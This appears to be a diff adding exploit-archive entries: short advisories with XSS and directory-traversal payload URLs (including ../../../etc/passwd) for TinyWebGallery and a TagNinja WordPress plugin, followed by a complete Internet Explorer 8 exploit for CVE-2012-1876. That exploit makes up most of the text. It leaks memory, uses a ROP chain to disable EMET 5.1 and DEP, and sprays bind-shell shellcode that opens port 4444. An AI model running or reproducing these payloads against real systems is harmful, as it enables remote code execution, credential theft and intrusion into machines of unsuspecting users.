+TinyWebGallery is prone to local file-include and cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+A remote attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Exploiting the local file-include issue allows the attacker to view and subsequently execute local files within the context of the webserver process.
+
+TinyWebGallery 1.8.3 is vulnerable; other versions may also be affected. 
+
+xamples:
+http://www.example.com/twg183/admin/index.php?sview="onmouseover=alert(String.fromCharCode(88,83,83));"
+http://www.example.com/twg183/admin/index.php?tview="onmouseover=alert(String.fromCharCode(88,83,83));"
+http://www.example.com/twg183/admin/index.php?dir=<script>alert("xss")</script>
+http://www.example.com/twg183/admin/index.php?action=chmod&item=<script>alert("xss")</script>
+http://www.example.com/twg183/twg183/admin/index.php?action=chmod&item="><script>alert("xss")</script>
+...
+
+--
+
+Vulnerability: Directory Traversal.
+Where:
+~ File: /admin/index.php
+~ Parameters: item
+
+Example:
+http://www.example.com/twg183/admin/index.php?action=edit&item=../../../etc/passwd
+

platforms/php/webapps/35300.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46090/info
+
+The TagNinja plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+TagNinja 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/tagninja/fb_get_profile.php?id=[xss] 

platforms/windows/remote/35273.html

@@ -0,0 +1,363 @@
+<!--
+** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.1 bypass
+** Exploit Coded by sickness || EMET 5.1 bypass by ryujin
+** http://www.offensive-security.com/vulndev/disarming-and-bypassing-emet-5-1/
+** Affected Software: Internet Explorer 8
+** Vulnerability: Fixed Col Span ID
+** CVE: CVE-2012-1876
+** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.1
+-->
+
+<html>
+<body>
+<div id="evil"></div>
+<table style="table-layout:fixed" ><col id="132" width="41" span="9" >  </col></table>
+<script language='javascript'>
+
+function strtoint(str) {
+        return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
+}
+
+var free = "EEEE";
+while ( free.length < 500 ) free += free;
+
+var string1 = "AAAA";
+while ( string1.length < 500 ) string1 += string1;
+
+var string2 = "BBBB";
+while ( string2.length < 500 ) string2 += string2;
+
+var fr = new Array();
+var al = new Array();
+var bl = new Array();
+
+var div_container = document.getElementById("evil");
+div_container.style.cssText = "display:none";
+
+for (var i=0; i < 500; i+=2) {
+        fr[i] = free.substring(0, (0x100-6)/2);
+        al[i] = string1.substring(0, (0x100-6)/2);
+        bl[i] = string2.substring(0, (0x100-6)/2);
+        var obj = document.createElement("button");
+        div_container.appendChild(obj);
+}
+
+for (var i=200; i<500; i+=2 ) {
+        fr[i] = null;
+        CollectGarbage();
+}
+
+function heapspray(cbuttonlayout) {
+    CollectGarbage();
+    var rop = cbuttonlayout + 4161; // RET
+    var rop = rop.toString(16);
+    var rop1 = rop.substring(4,8);
+    var rop2 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 11360; // POP EBP
+    var rop = rop.toString(16);
+    var rop3 = rop.substring(4,8);
+    var rop4 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
+    var rop = rop.toString(16);
+    var rop5 = rop.substring(4,8);
+    var rop6 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 12377; // POP EBX
+    var rop = rop.toString(16);
+    var rop7 = rop.substring(4,8);
+    var rop8 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 642768; // POP EDX
+    var rop = rop.toString(16);
+    var rop9 = rop.substring(4,8);
+    var rop10 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 12201; // POP ECX --> Changed
+    var rop = rop.toString(16);
+    var rop11 = rop.substring(4,8);
+    var rop12 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 5504544; // Writable location
+    var rop = rop.toString(16);
+    var writable1 = rop.substring(4,8);
+    var writable2 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 12462; // POP EDI
+    var rop = rop.toString(16);
+    var rop13 = rop.substring(4,8);
+    var rop14 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 12043; // POP ESI --> changed
+    var rop = rop.toString(16);
+    var rop15 = rop.substring(4,8);
+    var rop16 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 63776; // JMP EAX
+    var rop = rop.toString(16);
+    var jmpeax1 = rop.substring(4,8);
+    var jmpeax2 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 85751; // POP EAX
+    var rop = rop.toString(16);
+    var rop17 = rop.substring(4,8);
+    var rop18 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 4936; // VirtualProtect()
+    var rop = rop.toString(16);
+    var vp1 = rop.substring(4,8);
+    var vp2 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
+    var rop = rop.toString(16);
+    var rop19 = rop.substring(4,8);
+    var rop20 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 234657; // PUSHAD
+    var rop = rop.toString(16);
+    var rop21 = rop.substring(4,8);
+    var rop22 = rop.substring(0,4); // } RET
+
+
+    var rop = cbuttonlayout + 408958; // PUSH ESP
+    var rop = rop.toString(16);
+    var rop23 = rop.substring(4,8);
+    var rop24 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 2228408; // POP ECX
+    var rop = rop.toString(16);
+    var rop25 = rop.substring(4,8);
+    var rop26 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 1586172; // POP EAX
+    var rop = rop.toString(16);
+    var rop27 = rop.substring(4,8);
+    var rop28 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]
+    var rop = rop.toString(16);
+    var rop29 = rop.substring(4,8);
+    var rop30 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 1884912; // PUSH EAX
+    var rop = rop.toString(16);
+    var rop31 = rop.substring(4,8);
+    var rop32 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 2140694; // ADD EAX,ECX
+    var rop = rop.toString(16);
+    var rop33 = rop.substring(4,8);
+    var rop34 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX
+    var rop = rop.toString(16);
+    var rop35 = rop.substring(4,8);
+    var rop36 = rop.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX
+    var rop = rop.toString(16);
+    var rop37 = rop.substring(4,8);
+    var rop38 = rop.substring(0,4); // } RET
+
+    var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW
+    var getmodulew = getmodulew.toString(16);
+    var getmodulew1 = getmodulew.substring(4,8);
+    var getmodulew2 = getmodulew.substring(0,4); // } RET
+
+    var rop = cbuttonlayout + 3621437; // MOV EAX,EDX
+    var rop = rop.toString(16);
+    var rop41 = rop.substring(4,8);
+    var rop42 = rop.substring(0,4); // } RET
+
+    var shellcode = unescape("%u4444");
+    while (shellcode.length < 100)
+        shellcode = shellcode + shellcode;
+        var shellcode = shellcode.substr(0, 46);
+
+    shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
+    shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
+    shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN
+
+    // EMET disable part 0x01 annihilate ROP protections
+    // Implement the Tachyon detection grid to overcome the Romulan cloaking device.
+    shellcode+= unescape("%u"+rop27+"%u"+rop28);    // POP EAX # RETN
+    shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2);    // GetModuleHandleW Ptr
+    shellcode+= unescape("%u"+rop29+"%u"+rop30);    // MOV EAX,DWORD PTR [EAX] # RETN
+    shellcode+= unescape("%u"+rop31+"%u"+rop32);    // PUSH EAX # RETN
+    shellcode+= unescape("%u"+rop25+"%u"+rop26);    // POP ECX # RETN
+    shellcode+= unescape("%u5f3c%u07d2");           // EMET_STRING_PTR (GetModuleHandle argument) 
+    shellcode+= unescape("%u7372%u0006");           // Offset to "decoding helper" 0x67372
+    shellcode+= unescape("%u"+rop33+"%u"+rop34);    // ADD EAX,ECX # RETN (Get the address of the "decoding helper")
+    shellcode+= unescape("%u"+rop3+"%u"+rop4);      // POP EBP # RETN 
+    shellcode+= unescape("%u5e84%u07d2");           // Set EBP to successfully return from the "decoding helper" 
+    shellcode+= unescape("%u"+rop31+"%u"+rop32);    // PUSH EAX # RETN  Call the "decoding helper"
+    shellcode+= unescape("%u0000%u0000");			// Compensate for function epilogue
+    shellcode+= unescape("%u0000%u0000");			// Compensate for function epilogue 
+    shellcode+= unescape("%u0000%u0000");			// Compensate for function epilogue
+    shellcode+= unescape("%u0000%u0000");			// Compensate for function epilogue
+    shellcode+= unescape("%u"+rop41+"%u"+rop42);    // MOV EAX,EDX # RETN
+    shellcode+= unescape("%u"+rop15+"%u"+rop16);    // POP ESI # RETN
+    shellcode+= unescape("%u5f38%u07d2");           // MEM_ADDRESS_PTR (Store CONFIG_STRUCT here for later on) 
+    shellcode+= unescape("%u"+rop37+"%u"+rop38);    // MOV DWORD PTR DS:[ESI],EAX
+    shellcode+= unescape("%u"+rop25+"%u"+rop26);    // POP ECX # RETN
+    shellcode+= unescape("%u01b8%u0000");           // offset to NtProtectVirtualMemory unhooked
+    shellcode+= unescape("%u"+rop33+"%u"+rop34);    // ADD EAX,ECX # RETN (Get the address of NtProtectVirtualMemory)
+    shellcode+= unescape("%u"+rop29+"%u"+rop30);    // MOV EAX,DWORD PTR [EAX] # RETN
+    shellcode+= unescape("%u"+rop31+"%u"+rop32);    // PUSH EAX # RETN
+    shellcode+= unescape("%u"+rop27+"%u"+rop28);    // POP EAX # RETN
+    shellcode+= unescape("%uffff%uffff");           // ProcessHandle
+    shellcode+= unescape("%u5f38%u07d2");           // *BaseAddress
+    shellcode+= unescape("%u5f34%u07d2");           // NumberOfBytesToProtect
+    shellcode+= unescape("%u0040%u0000");           // NewAccessProtection
+    shellcode+= unescape("%u5f30%u07d2");           // OldAccessProtection
+    shellcode+= unescape("%u5f38%u07d2");           // Reget pointer
+    shellcode+= unescape("%u"+rop29+"%u"+rop30);    // MOV EAX,DWORD PTR [EAX] # RETN
+    shellcode+= unescape("%u"+rop25+"%u"+rop26);    // POP ECX # RETN
+    shellcode+= unescape("%u0558%u0000");           // Offset to EMET mitigations switch
+    shellcode+= unescape("%u"+rop33+"%u"+rop34);    // ADD EAX,ECX # RETN
+    shellcode+= unescape("%u"+rop25+"%u"+rop26);    // POP ECX # RETN
+    shellcode+= unescape("%u0000%u0000");           // NULL
+    shellcode+= unescape("%u"+rop35+"%u"+rop36);    // MOV DWORD PTR [EAX],ECX # RETN
+
+    // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)
+    shellcode+= unescape("%u"+rop3+"%u"+rop4);      // POP EBP
+    shellcode+= unescape("%u"+rop3+"%u"+rop4);      // POP EBP
+    shellcode+= unescape("%u"+rop7+"%u"+rop8);      // POP EBX
+    shellcode+= unescape("%u1024%u0000");           // Size 0x00001024
+    shellcode+= unescape("%u"+rop9+"%u"+rop10);     // POP EDX
+    shellcode+= unescape("%u0040%u0000");           // 0x00000040
+    shellcode+= unescape("%u"+rop11+"%u"+rop12);    // POP ECX
+    shellcode+= unescape("%u"+writable1+"%u"+writable2);  // Writable Location
+    shellcode+= unescape("%u"+rop13+"%u"+rop14);    // POP EDI
+    shellcode+= unescape("%u"+rop1+"%u"+rop2);      // RET
+    shellcode+= unescape("%u"+rop15+"%u"+rop16);    // POP ESI
+    shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);// JMP EAX
+    shellcode+= unescape("%u"+rop17+"%u"+rop18);    // POP EAX
+    shellcode+= unescape("%u"+vp1+"%u"+vp2);        // VirtualProtect()
+    shellcode+= unescape("%u"+rop19+"%u"+rop20);    // MOV EAX,DWORD PTR DS:[EAX]
+    shellcode+= unescape("%u"+rop21+"%u"+rop22);    // PUSHAD
+    shellcode+= unescape("%u"+rop23+"%u"+rop24);    // PUSH ESP
+
+    // Store various pointers here
+    shellcode+= unescape("%u9090%u9090");           // NOPs
+    shellcode+= unescape("%u9090%u18eb");           // NOPs
+    shellcode+= unescape("%u4242%u4242");           // OldAccessProtection
+    shellcode+= unescape("%u0564%u0000");           // Size for NtVirtualProtectMemory
+    shellcode+= unescape("%u4141%u4141");           // Store BaseAddress address on the *stack*
+    shellcode+= "EMET";                             // EMET string
+    shellcode+= unescape("%u0000%u0000");           // EMET string
+    shellcode+= unescape("%u9090%u9090");           // NOPs
+    shellcode+= unescape("%u9090%u9090");           // NOPs
+    // Store various pointers here
+
+    // EMET disable part 0x02 annihilate EAF/EAF+ by calling NtSetContextThread 
+    // MOV     EAX,DWORD PTR DS:[076D10BCH]
+    // MOV     EAX,DWORD PTR DS:[007D25F48H]
+    // MOV     ESI,DWORD PTR [EAX+518H]
+    // SUB     ESP,2CCH
+    // MOV     DWORD PTR [ESP],10010H
+    // MOV     EDI,ESP
+    // MOV     ECX,2CCH
+    // ADD     EDI,4
+    // SUB     ECX,4
+    // XOR     EAX,EAX
+    // REP STOS BYTE PTR ES:[EDI]
+    // PUSH    ESP
+    // PUSH    0FFFFFFFEH
+    // CALL    ESI
+    shellcode+= unescape("%u38a1%ud25f%u8b07%u18b0%u0005%u8100%uccec" +
+                         "%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" +
+                         "%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" +
+                         "%ufe6a%ud6ff");
+    shellcode+= unescape("%u9090%u9090");           // NOPs
+    shellcode+= unescape("%u9090%u9090");           // NOPs
+    // EMET disable part 0x02 end
+
+    // Bind shellcode on 4444 :)
+    // msf > generate -t js_le
+    // windows/shell_bind_tcp - 342 bytes
+    // http://www.metasploit.com
+    // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
+    // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
+    // I would keep the shellcode the same size for better reliability :)
+
+    shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
+                             "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
+                             "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
+                             "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
+                             "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
+                             "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
+                             "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
+                             "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
+                             "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
+                             "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
+                             "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
+                             "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
+                             "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
+                             "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
+                             "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
+                             "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
+                             "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
+                             "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
+                             "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
+                             "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
+                             "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
+                             "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
+                             "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
+                             "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
+                             "%u006a%uff53%u41d5");
+
+    // Total spray should be 1000
+    var padding = unescape("%u9090");
+    while (padding.length < 1000)
+        padding = padding + padding;
+    var padding = padding.substr(0, 1000 - shellcode.length);
+
+    shellcode+= padding;
+
+    while (shellcode.length < 100000)
+        shellcode = shellcode + shellcode;
+
+    var onemeg = shellcode.substr(0, 64*1024/2);
+
+    for (i=0; i<14; i++) {
+        onemeg += shellcode.substr(0, 64*1024/2);
+    }
+
+    onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
+
+    var spray = new Array();
+
+    for (i=0; i<100; i++) {
+        spray[i] = onemeg.substr(0, onemeg.length);
+    }
+}
+
+function leak(){
+        var leak_col = document.getElementById("132");
+        leak_col.width = "41";
+        leak_col.span = "19";
+}
+
+function get_leak() {
+        var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
+        str_addr = str_addr - 1410704;
+        var hex = str_addr.toString(16);
+        //alert(hex);
+        setTimeout(function(){heapspray(str_addr)}, 50);
+}
+
+function trigger_overflow(){
+        var evil_col = document.getElementById("132");
+        evil_col.width = "1312272"; // 0x07D25E40
+        evil_col.span = "44";
+}
+
+setTimeout(function(){leak()}, 400);
+setTimeout(function(){get_leak()},450);
+setTimeout(function(){trigger_overflow()}, 700);
+
+</script>
+</body>
+</html>